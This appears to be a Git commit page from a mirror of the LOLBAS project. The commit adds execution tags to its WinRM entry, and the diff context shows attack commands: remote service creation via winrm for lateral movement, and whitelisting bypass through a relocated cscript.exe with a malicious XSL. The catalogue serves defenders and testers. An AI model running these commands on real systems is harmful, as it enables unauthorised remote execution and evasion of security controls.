public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-16 00:22:56 +01:00
Code Issues Projects Releases Wiki Activity

Update Winrm.yml Tags

Browse Source 
Added Tags:
Execute: CMD
Execute: Remote
This commit is contained in:
hegusung 2024-10-13 20:21:46 +02:00 committed by GitHub
parent ac7ac2af00
commit 76060761ae
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
yml/OSScripts/Winrm.yml
View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution Usecase: Proxy execution
@ -18,6 +21,9 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
Usecase: Execute arbitrary, unsigned code via XSL script Usecase: Execute arbitrary, unsigned code via XSL script
@ -25,6 +31,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1220 MitreID: T1220
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs